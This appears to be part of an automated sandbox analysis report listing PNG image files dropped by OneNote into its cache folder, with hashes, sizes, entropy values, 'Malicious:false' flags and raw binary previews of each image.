                                                                                                                                                    Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000P.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1924
                                                                                                                                                    Entropy (8bit):7.836744258175623
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                    MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                    SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                    SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                    SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000Q.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11886
                                                                                                                                                    Entropy (8bit):7.946442244439929
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                    MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                    SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                    SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                    SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000R.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2270
                                                                                                                                                    Entropy (8bit):7.845368393313232
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                    MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                    SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                    SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                    SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000S.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16003
                                                                                                                                                    Entropy (8bit):7.959532793770661
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                    MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                    SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                    SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                    SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000T.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13241
                                                                                                                                                    Entropy (8bit):7.931391290415517
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                    MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                    SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                    SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                    SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000U.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4190
                                                                                                                                                    Entropy (8bit):7.94161730428269
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                    MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                    SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                    SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                    SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000V.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4081
                                                                                                                                                    Entropy (8bit):7.943373267196131
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                    MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                    SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                    SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                    SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000010.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):22634
                                                                                                                                                    Entropy (8bit):7.974332204835705
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                    MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                    SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                    SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                    SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000011.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):17289
                                                                                                                                                    Entropy (8bit):7.962998633267186
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                    MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                    SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                    SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                    SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000012.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13737
                                                                                                                                                    Entropy (8bit):7.916899917415529
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                    MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                    SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                    SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                    SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000013.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2332
                                                                                                                                                    Entropy (8bit):7.8822150338370776
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                    MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                    SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                    SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                    SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000014.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11332
                                                                                                                                                    Entropy (8bit):7.9324721568775285
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                    MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                    SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                    SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                    SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                    Malicious:false
